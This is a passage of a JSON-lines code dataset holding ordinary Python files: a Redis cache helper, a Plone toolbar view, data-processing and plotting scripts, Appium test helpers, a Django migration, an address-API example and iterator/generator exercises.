cache(key, obj):\n \"\"\"\n take the provided python data structure, serialise it via json to a string, and\n store it at the provided key with the appropriate timeout. This may be\n required to create a new cache entry or update an existing one\n \"\"\"\n try:\n s = json.dumps(obj)\n except TypeError:\n raise CacheException(\"can only cache python objects that can be sent through json.dumps\")\n \n client = redis.StrictRedis(host=config.REDIS_CACHE_HOST, port=config.REDIS_CACHE_PORT, db=config.REDIS_CACHE_DB)\n client.setex(key, config.REDIS_CACHE_TIMEOUT, s)\n \nclass CacheException(Exception):\n def __init__(self, message):\n self.message = message\n super(CacheException, self).__init__(self, message)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n", "sub_path": "openarticlegauge/cache.py", "file_name": "cache.py", "file_ext": "py", "file_size_in_byte": 3411, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "redis.StrictRedis", "line_number": 11, "usage_type": "call"}, {"api_name": "config.REDIS_CACHE_HOST", "line_number": 11, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_PORT", "line_number": 11, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_DB", "line_number": 11, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 51, "usage_type": "attribute"}, {"api_name": "config.date_format", "line_number": 51, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 65, "usage_type": "call"}, {"api_name": "config.licence_stale_time", "line_number": 65, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime", 
"line_number": 66, "usage_type": "attribute"}, {"api_name": "redis.StrictRedis", "line_number": 74, "usage_type": "call"}, {"api_name": "config.REDIS_CACHE_HOST", "line_number": 74, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_PORT", "line_number": 74, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_DB", "line_number": 74, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 84, "usage_type": "call"}, {"api_name": "redis.StrictRedis", "line_number": 88, "usage_type": "call"}, {"api_name": "config.REDIS_CACHE_HOST", "line_number": 88, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_PORT", "line_number": 88, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_DB", "line_number": 88, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_TIMEOUT", "line_number": 89, "usage_type": "attribute"}]} +{"seq_id": "109235743", "text": "from zope.component import getMultiAdapter\n#from zope.component import getUtility\nfrom zope.publisher.browser import BrowserView\n#from plone.registry.interfaces import IRegistry\nfrom plone.memoize.instance import memoize\nfrom plone.app.layout.viewlets.common import PersonalBarViewlet as BasePersonalBarViewlet\nfrom Acquisition import aq_inner\nfrom urllib import unquote\n\n#from Acquisition import aq_base\nfrom AccessControl import getSecurityManager\n#from Products.CMFCore.utils import getToolByName\n#from Products.CMFPlone.interfaces import IPloneSiteRoot\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\n\nclass Toolbar(BrowserView):\n \"\"\"The view containing the overlay toolbar\n \"\"\"\n\n def __call__(self):\n # Disable theming\n self.request.response.setHeader('X-Theme-Disabled', 'True')\n\n # Set the CMSUI skin so that we get the correct resources\n self.context.changeSkin('toolbar', self.request)\n\n # Commonly useful variables\n self.securityManager = getSecurityManager()\n self.anonymous = self.portalState.anonymous()\n self.tools = getMultiAdapter((self.context, self.request), name=u'plone_tools')\n\n # Render the template\n return self.index()\n\n # Personal actions\n\n @property\n @memoize\n def contextState(self):\n return getMultiAdapter((self.context, self.request), name=u'plone_context_state')\n\n @property\n @memoize\n def portalState(self):\n return getMultiAdapter((self.context, self.request), name=u'plone_portal_state')\n\n @memoize\n def personalActions(self):\n \"\"\"Get the personal actions\n \"\"\"\n actions = []\n for action in self.contextState.actions('user'):\n actions.append({\n 'id': action['id'],\n 'url': action['url'],\n 'title': action['title'],\n 'description': action['description'],\n })\n\n return actions\n\n @memoize\n def userName(self):\n \"\"\"Get the username of the currently logged in user\n \"\"\"\n if self.anonymous:\n return None\n\n member = self.portalState.member()\n userid = member.getId()\n\n membership = self.tools.membership()\n memberInfo = membership.getMemberInfo(userid)\n\n fullname = userid\n\n # Member info is None if there's no Plone user object, as when using OpenID.\n if memberInfo is not None:\n fullname = memberInfo.get('fullname', '') or fullname\n\n return fullname\n\n @memoize\n def userHomeLinkURL(self):\n \"\"\"Get the URL of the user's home page (profile age)\n \"\"\"\n member = self.portalState.member()\n userid = member.getId()\n return \"%s/author/%s\" % (self.portalState.navigation_root_url(), userid)\n\n @memoize\n def userPortrait(self):\n \"\"\"Get the URL of the user's portrait\n 
\"\"\"\n\n member = self.portalState.member()\n membership = self.tools.membership()\n portrait = membership.getPersonalPortrait(member.getId());\n if portrait is not None:\n return portrait.absolute_url()\n\n @memoize\n def workflowState(self):\n \"\"\"Get the name of the workflow state\n \"\"\"\n state = self.contextState.workflow_state()\n if state is None:\n return None\n workflows = self.tools.workflow().getWorkflowsFor(self.context)\n if workflows:\n for w in workflows:\n if state in w.states:\n return w.states[state].title or state\n return state\n\n @memoize\n def editLink(self):\n \"\"\"Get the URL of the edit action - taking locking into account\n \"\"\"\n if not self.securityManager.checkPermission('Modify portal content', self.context):\n return None\n if self.contextState.is_locked():\n return self.context.absolute_url() + \"/@@toolbar-lock-info\"\n objectActions = self.contextState.actions('object')\n for action in objectActions:\n if action['id'] == self.settings.editActionId:\n return \"%s?last_referer=%s\" % (action['url'], self.context.absolute_url())\n return None\n\n @memoize\n def settingsActions(self):\n \"\"\"Render every action other than the excluded ones (edit, view).\n Use the action icon if applicable, but fall back on the default icon.\n \"\"\"\n\n actions = []\n objectActions = self.contextState.actions('object')\n\n defaultIcon = self.portalState.navigation_root_url() + self.settings.defaultActionIcon\n\n for action in objectActions:\n if action['id'] in self.settings.excludedActionIds:\n continue\n\n icon = action['icon']\n if not icon:\n icon = defaultIcon\n\n actions.append({\n 'id': action['id'],\n 'url': action['url'],\n 'title': action['title'],\n 'description': action['description'],\n 'icon': icon,\n })\n\n return actions\n\n @memoize\n def baseURL(self):\n return self.context.absolute_url()\n\n @memoize\n def prepareObjectTabs(self, default_tab='view',\n sort_first=['folderContents']):\n \"\"\"Prepare the object tabs by determining their order and working\n out which tab is selected. 
Used in global_contentviews.pt\n \"\"\"\n context = aq_inner(self.context)\n context_url = context.absolute_url()\n context_fti = context.getTypeInfo()\n\n context_state = getMultiAdapter(\n (context, self.request), name=u'plone_context_state')\n actions = context_state.actions\n\n action_list = []\n if context_state.is_structural_folder():\n action_list = actions('folder')\n action_list.extend(actions('object'))\n\n tabs = []\n found_selected = False\n fallback_action = None\n\n # we use the context-acquired request object here, which is\n # different from the request fetching the tile HTML\n request_url = self.context.REQUEST['ACTUAL_URL']\n request_url_path = request_url[len(context_url):]\n\n if request_url_path.startswith('/'):\n request_url_path = request_url_path[1:]\n\n for action in action_list:\n item = {'title': action['title'],\n 'id': action['id'],\n 'url': '',\n 'selected': False}\n\n action_url = action['url'].strip()\n starts = action_url.startswith\n if starts('http') or starts('javascript'):\n item['url'] = action_url\n else:\n item['url'] = '%s/%s' % (context_url, action_url)\n\n action_method = item['url'].split('/')[-1]\n\n # Action method may be a method alias:\n # Attempt to resolve to a template.\n action_method = context_fti.queryMethodID(\n action_method, default=action_method)\n if action_method:\n request_action = unquote(request_url_path)\n request_action = context_fti.queryMethodID(\n request_action, default=request_action)\n if action_method == request_action:\n item['selected'] = True\n found_selected = True\n\n current_id = item['id']\n if current_id == default_tab:\n fallback_action = item\n\n tabs.append(item)\n\n if not found_selected and fallback_action is not None:\n fallback_action['selected'] = True\n\n def sortOrder(tab):\n try:\n return sort_first.index(tab['id'])\n except ValueError:\n return 255\n\n tabs.sort(key=sortOrder)\n return tabs\n\n def object_actions(self):\n context = aq_inner(self.context)\n context_state = getMultiAdapter((context, self.request),\n name=u'plone_context_state')\n\n return context_state.actions('object_actions')\n\n def icon(self, action):\n return action.get('icon', None)\n\n\nclass PersonalBarViewlet(BasePersonalBarViewlet):\n\n index = ViewPageTemplateFile('templates/personal_bar.pt')\n", "sub_path": "plone/app/toolbar/toolbar.py", "file_name": "toolbar.py", "file_ext": "py", "file_size_in_byte": 8306, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "zope.publisher.browser.BrowserView", "line_number": 17, "usage_type": "name"}, {"api_name": "AccessControl.getSecurityManager", "line_number": 29, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 31, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 41, "usage_type": "call"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 39, "usage_type": "name"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 46, "usage_type": "call"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 44, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 48, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 63, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 84, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 92, "usage_type": "name"}, {"api_name": 
"plone.memoize.instance.memoize", "line_number": 103, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 117, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 131, "usage_type": "name"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 160, "usage_type": "name"}, {"api_name": "Acquisition.aq_inner", "line_number": 170, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 174, "usage_type": "call"}, {"api_name": "urllib.unquote", "line_number": 215, "usage_type": "call"}, {"api_name": "plone.memoize.instance.memoize", "line_number": 164, "usage_type": "name"}, {"api_name": "Acquisition.aq_inner", "line_number": 241, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 242, "usage_type": "call"}, {"api_name": "plone.app.layout.viewlets.common.PersonalBarViewlet", "line_number": 251, "usage_type": "name"}, {"api_name": "Products.Five.browser.pagetemplatefile.ViewPageTemplateFile", "line_number": 253, "usage_type": "call"}]} +{"seq_id": "7607897", "text": "import scipy.stats as stats\nimport sys\nimport numpy as np\nimport tqdm\nfrom sklearn.utils.extmath import softmax\nimport h5py\nimport matplotlib.pyplot as plt\nfrom itertools import permutations\ndata=['Kommission', 'Kommission@@', 'Kommissions@@', 'Kommiss@@', 'Kommissionspräsi@@',\n 'Kommissionspräsident', 'Rat', 'Parlament', 'Kommissionspräsidenten',\n 'Kommissionsvorschlag', 'Kommissionsmitgli@@', 'Kommissionsmitglieder',\n 'Kommissionsmitglied', 'Kommissar', 'Kommissarin', 'Berichterstatterin',\n 'Mitgliedstaaten', 'Parlaments', 'Vorschlag', 'Berichterstatters']\n\n\n\nsample_width = len(data[0])\n\nx = np.arange(sample_width)\n\n\nmode = 'gaussian'\n\ndef scatter(a, dim, index, b): # a inplace\n expanded_index = tuple([index if dim==i else np.arange(a.shape[i]).reshape([-1 if i==j else 1 for j in range(a.ndim)]) for i in range(a.ndim)])\n a[expanded_index] = b\n print(\"a;\",a)\n print(expanded_index)\n\nif mode == 'gaussian':\n std = 1\n offset = 0\n mean = 0\n sample_width = 0\n softmax_position = \"presoftmax\"\n softmax_temperature = 1\n output_path = \"out.txt\"\n\n distribution_func = stats.norm(mean, std)\n\nelif mode == 'linear':\n k = 0\n b = 1.0\n offset = 0\n sample_width = 0\n softmax_position = 0\n\nfigsize = 20, 10\nfigure, ax = plt.subplots(figsize=figsize)\n\ny_sample = distribution_func.pdf(x)\nprint(y_sample)\ny_sample = softmax(np.expand_dims(y_sample,0)).squeeze(0)\ny_sample = y_sample[:10]\nprint(len(y_sample))\nplt.plot(data[:len(y_sample)], y_sample, marker=\"o\")\nplt.show()\n\n\"\"\"y_sample=[[2,2,2,2,2.0,0,0,0,0,0]]\ny_sample=softmax(y_sample)\nplt.plot(data[:len(y_sample[0])], y_sample[0], marker=\"o\")\nprint(data)\nplt.show()\"\"\"\n\nprint(y_sample)", "sub_path": "D2GPo/extra_processing.py", "file_name": "extra_processing.py", "file_ext": "py", "file_size_in_byte": 1710, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.arange", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": 
"sklearn.utils.extmath.softmax", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "231485389", "text": "from baseView.baseView import BaseView\nfrom selenium.webdriver.common.by import By\nimport os\nimport time\n\nclass Common(BaseView):\n\tcancelBtn = (By.ID, 'android:id/button2')\n\tskiptBtn=(By.ID,'com.tal.kaoyan:id/tv_skip')\n\n\n\tdef check_cancelBtn(self):\n\t\ttry:\n\t\t\tcancelBtn=self.ele_is_visibility(self.cancelBtn)\n\t\texcept:\n\t\t\tself.logger.info('没有取消升级按钮')\n\t\telse:\n\t\t\tcancelBtn.click()\n\n\tdef check_skiptBtn(self):\n\t\ttry:\n\t\t\tskiptBtn=self.ele_is_visibility(self.skiptBtn)\n\t\texcept:\n\t\t\tself.logger.info('没有跳过按钮')\n\t\telse:\n\t\t\tskiptBtn.click()\n\n\tdef get_size(self):\n\t\tx = self.driver.get_window_size()['width']\n\t\ty = self.driver.get_window_size()['height']\n\t\treturn x, y\n\n\tdef swipeLeft(self):\n\t\tsize = self.get_size()\n\t\tx1 = int(size[0] * 0.9)\n\t\ty = int(size[1] * 0.5)\n\t\tx2 = int(size[0] * 0.2)\n\t\tself.driver.swipe(x1, y, x2, y, 1000)\n\n\tdef getTime(self):\n\t\treturn time.strftime(\"%Y-%m-%d %H_%M_%S\")\n\n\tdef getScreenShot(self,text):\n\t\ttime=self.getTime()\n\t\timage_file=os.path.dirname(os.path.dirname(__file__))+'/screenshots/%s_%s.png' %(text,time)\n\t\tself.logger.info('get %s screenshot' %text)\n\t\tself.driver.get_screenshot_as_file(image_file)\n\nif __name__=='__main__':\n\tcommon=Common()\n\tcommon.check_cancelBtn()\n\tcommon.check_skiptBtn()\n\tcommon.getScreenShot('登录页面截图')", "sub_path": "appium_05test/common/common_fun.py", "file_name": "common_fun.py", "file_ext": "py", "file_size_in_byte": 1298, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "baseView.baseView.BaseView", "line_number": 6, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 7, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 7, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 8, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 8, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}]} +{"seq_id": "643468222", "text": "import spidev\n\n\nclass Clock:\n\n def __init__(self, hora_inicial):\n self.spi = spidev.SpiDev()\n self.spi.open(0,1)\n self.spi.max_speed_hz = 312500\n self.spi.mode = 1\n self.spi.cshigh = True\n self.spi.xfer2([0x8F, 0x00])\n self.spi.xfer2( 0x80 + hora_inicial)\n\n def cambiar_hora(self, hora):\n self.spi.xfer2(0x80 + hora)\n\n def devolver_hora(self):\n datos = self.spi.xfer2( [0x00, 1, 2, 3, 4, 5, 6, 7] )\n del datos[4]\n del datos[0]\n datos[0], datos[2] = datos[2], datos[0]\n hora = self.hexa_to_dec(datos)\n return hora\n\n def hexa_to_dec(self, hex_numbers):\n dec_numbers = []\n for hex_number in hex_numbers:\n MSB_number = hex_number >> 4\n LSB_number = hex_number & 0x0F\n dec_numbers.append( MSB_number * 10 
+ LSB_number )\n return dec_numbers\n ", "sub_path": "3-Proyecto_FInal/Modulos/clock.py", "file_name": "clock.py", "file_ext": "py", "file_size_in_byte": 903, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "spidev.SpiDev", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "437366188", "text": "import pandas as pd\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser(description='Small script to create sample from given dataset')\nparser.add_argument('input_path', metavar='P', type=str, nargs='?',\n help='path for dataset need to be sampled')\nparser.add_argument('--n', metavar='N', type=int, nargs='?', default=1000,\n help='number of data counts')\nparser.add_argument('--output_path', metavar='O', type=str, nargs='?', default=None,\n help='output path for new sample')\nparser.add_argument('--choice', metavar='C', type=str, nargs='?', default='straight',\n help='choose straight or random')\n\n\n\nargs = parser.parse_args()\nif args.output_path is None:\n args.output_path = os.path.join('/'.join(args.input_path.split('/')[:-1]), # drop filename\n 'sample_{}_{}.csv'.format(args.n, args.choice))\n\ndf = pd.read_csv(args.input_path)\nif args.choice == 'straight':\n df.iloc[:args.n].to_csv(args.output_path, index=False)\nif args.choice == 'random':\n df.sample(n=args.n).to_csv(args.output_path, index=False)\n", "sub_path": "src/old code base/dataset_related/dataset_sampler.py", "file_name": "dataset_sampler.py", "file_ext": "py", "file_size_in_byte": 1149, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "595049888", "text": "#!/usr/bin/env python3\n\"\"\"Script used to download the ANTs data from the storage server.\n\nScript to download all the UK BIOBANK files preprocessed using the\nscripts available at the imaging_preprocessing_ANTs folder.\n\nNOTE: Only for internal use at the Machine Learning in Mental Health Lab.\n\"\"\"\nimport argparse\nfrom pathlib import Path\nfrom shutil import copyfile\n\nPROJECT_ROOT = Path.cwd()\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-N', '--nas_path',\n dest='nas_path_str',\n help='Path to the Network Attached Storage system.')\n\nparser.add_argument('-S', '--scanner_name',\n dest='scanner_name',\n help='Name of the scanner.')\n\nparser.add_argument('-O', '--output_path',\n dest='output_path_str',\n help='Path to the local output folder.')\n\nargs = parser.parse_args()\n\n\ndef main(nas_path_str, scanner_name, output_path_str):\n \"\"\"Perform download of selected datasets from the network-attached storage.\"\"\"\n nas_path = Path(nas_path_str)\n output_path = Path(output_path_str)\n\n dataset_name = 'BIOBANK'\n\n dataset_output_path = output_path / dataset_name\n dataset_output_path.mkdir(exist_ok=True)\n\n selected_path = nas_path / 'ANTS_NonLinear_preprocessed' / dataset_name / scanner_name\n\n for file_path in selected_path.glob('*.nii.gz'):\n print(file_path)\n copyfile(str(file_path), str(dataset_output_path / file_path.name))\n\n\nif __name__ == '__main__':\n main(args.nas_path_str, args.scanner_name, args.output_path_str)\n", "sub_path": "src/download/download_ants_data.py", 
"file_name": "download_ants_data.py", "file_ext": "py", "file_size_in_byte": 1583, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pathlib.Path.cwd", "line_number": 13, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 13, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 34, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 35, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "648838767", "text": "import numpy as np\nimport pandas as pd\n\n\nbatch_size = 16\nen_max_length = 10\nzh_max_length = 15\nhidden = 256\nSAMPLE = 5000\n\nimport pickle\ndef save_obj(obj, name):\n with open(f'./output/{name}.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\ndef load_obj(name):\n with open(f'./output/{name}.pkl', 'rb') as f:\n return pickle.load(f)\n\n\nclass Pre_Pro():\n def __init__(self, symbol):\n self.symbol = symbol\n\n def process_en(self, sen):\n for s in self.symbol:\n sen = sen.replace(s, ' ' + s + ' ')\n return np.array(sen.split(), dtype=str)\n\n def process_zh(self, sen, mode):\n if mode == 'org':\n return np.array([''] + list(sen) + [''], dtype=str)\n elif mode == 'dec_in':\n return np.array([''] + list(sen), dtype=str)\n elif mode == 'dec_out':\n return np.array(list(sen) + [''], dtype=str)\n\n\ndef get_data(path):\n data = pd.read_table(path, header=None)\n data.columns = ['inputs', 'targets']\n symbol = ['.', ',', '!', '?', '\"', ':', ';',\n '。', ',', '!', '?', '“', '”', ':', ';']\n pre_pro = Pre_Pro(symbol)\n data['enc_inputs'] = data['inputs'].apply(lambda x: pre_pro.process_en(x))\n data['dec_inputs'] = data['targets'].apply(lambda x: pre_pro.process_zh(x, 'dec_in'))\n data['outputs'] = data['targets'].apply(lambda x: pre_pro.process_zh(x, 'org'))\n data['targets'] = data['targets'].apply(lambda x: pre_pro.process_zh(x, 'dec_out'))\n return data\n\n\ndef get_word2index(word_lists):\n from collections import Counter\n words_counter = Counter()\n word2index = {}\n word2index['PAD'] = 0\n word2index['UNK'] = 1\n for word_list in word_lists:\n for word in word_list:\n words_counter[word] += 1\n for i, (word, _) in enumerate(words_counter.most_common(len(words_counter))):\n word2index[word] = i + 2\n return word2index\n\n\ndef make_data(word_lists, max_length, word2index):\n x = np.zeros((len(word_lists), max_length), dtype=int)\n for i, word_list in enumerate(word_lists):\n for j, word in enumerate(word_list):\n if j == max_length:\n break\n x[i][j] = word2index.get(word, 1)\n return x\n\n\ndef get_sort_seq(enc_inputs, dec_inputs, targets, mode):\n seqs_len = []\n for seq in enc_inputs:\n seq_len = len(seq) - np.equal(seq, 0).sum()\n if seq_len > 0:\n seqs_len.append(seq_len)\n else:\n seqs_len.append(1)\n index = list(np.argsort(seqs_len)[::-1])\n seqs_len = sorted(seqs_len, reverse=True)\n\n X1, X2, y = [], [], []\n if mode == 'predict':\n for i, _ in enumerate(enc_inputs):\n X1.append(enc_inputs[index[i]])\n X2.append(dec_inputs[index[i]])\n else:\n for i, _ in enumerate(enc_inputs):\n X1.append(enc_inputs[index[i]])\n X2.append(dec_inputs[index[i]])\n y.append(targets[index[i]])\n return X1, seqs_len, X2, y", "sub_path": "机器翻译/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 3018, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", 
"pt": "32", "api": [{"api_name": "pickle.dump", "line_number": 14, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 40, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "627316580", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('tomographic_db', '0003_tomoimages_imagename'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='tomoimages',\n name='imageUrl',\n field=models.ImageField(upload_to=b'JGR_figures'),\n ),\n ]\n", "sub_path": "tomographic_db/migrations/0004_auto_20150628_1648.py", "file_name": "0004_auto_20150628_1648.py", "file_ext": "py", "file_size_in_byte": 429, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "69265729", "text": "#!/usr/bin/env python3\n\nimport configparser\nimport exceptions\nimport output as op\nimport os\n\nconfig_file = \"config.ini\"\nif os.path.exists(config_file):\n config = configparser.ConfigParser()\n config.read(config_file)\n\n SWING_API_KEY = config['keys']['swing_api_key']\n CURRENT_CAPITAL = float(config['account']['current_capital'])\n COMMISSION_COST = float(config['account']['commission_cost'])\n VERBOSITY = int(config['app']['verbosity'])\n WRITE_TO_FILE = True if config['app']['write_to_file'] == \"true\" else False\nelse:\n op.log_error(exceptions.DocumentError)", "sub_path": "config_loader.py", "file_name": "config_loader.py", "file_ext": "py", "file_size_in_byte": 583, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 10, "usage_type": "call"}, {"api_name": "output.log_error", "line_number": 19, "usage_type": "call"}, {"api_name": "exceptions.DocumentError", "line_number": 19, "usage_type": "attribute"}]} +{"seq_id": "158545818", "text": "import json\nimport urllib\nfrom urllib import parse, request\n\n# Obtain an authentication ID/token pair from your\n# SmartyStreets account and put them in below.\n\nLOCATION = 
'https://api.smartystreets.com/street-address'\nQUERY_STRING = urllib.parse.urlencode({ # entire query string must be URL-encoded\n    'auth-id': r'YOUR-AUTH-ID',\n    'auth-token': r'YOUR-AUTH-TOKEN',\n    'street': '1 infinite loop',\n    'city': 'cupertino',\n    'state': 'ca',\n    'zipcode': '95014',\n    'candidates': '1'\n})\nURL = LOCATION + '?' + QUERY_STRING\n\n# Perform request, read result, and load from string into Python object\nresponse = urllib.request.urlopen(URL).read()\nresults = json.loads(response.decode('utf-8'))\n\n# Pretty print for demo purposes\npretty = json.dumps(results, sort_keys=True, indent=4)\nprint(pretty)\n\n# Then, to use the results in Python, very easy... for example:\nprint(results[0]['delivery_line_1'])", "sub_path": "python/street-address-python3.py", "file_name": "street-address-python3.py", "file_ext": "py", "file_size_in_byte": 895, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "urllib.parse.urlencode", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 9, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "200995080", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@File   : january13.py\n@Author: lee\n@Date   : 2020/1/7 6:42\n@Desc   : \n'''\n# int\nprint(int('0b100', base=2))\n# float\nprint(float('1e+9'))\nprint(float('1e-6'))\na = 1.2e-4\nprint(\"%.5f\" % a)\nprint(\"{:.5f}\".format(a))\nprint(round(a, 5))\n# check whether a string is an iterable object\nfrom collections import Iterable, Iterator\n\nb = '你好'\nprint(isinstance(b, Iterable))  # False\nprint(hasattr(str, '__iter__'))\nmyList = [11, 10, 1, 2, 9, 3, 8, 4, 5, ]\nobj = reversed(myList)\nprint(hasattr(obj, '__next__'))  # True\n# generator usage\nprint((i for i in range(10)))\n\n\ndef gen_obj(lst):\n    for i in lst:\n        a = yield i\n        print(\"a is %s\" % a)\n\n\ng = gen_obj(myList)\n# print(next(g))\ng.__next__()\ng.send(100)\n\n\n# sequence protocol\nclass Book:\n    def __init__(self):\n        self.book = [\"红楼梦\", \"西游记\", \"金瓶梅\"]\n\n    def __getitem__(self, item):\n        print(\"start Book-getitem func\")\n        return self.book[item]\n\n\nb = Book()\nfor i in b:\n    print(i)\nprint(b[2])  # 金瓶梅\n\n\nclass Person:\n    def __init__(self):\n        self.msg = {\"name\": \"lee\", \"age\": 24}\n\n    def __iter__(self):\n        for i in self.msg.items():\n            yield i\n\n    def __getitem__(self, item):\n        print(\"start Person-getitem func\")\n        return self.msg[item]\n\n\np = Person()\nfor i in p:\n    print(i)\nprint(p[\"name\"])\n\n\n# implement an iterable with an iterator\nclass MyIterator(Iterator):\n    def __init__(self, lst):\n        self.lst = lst\n        self.index = 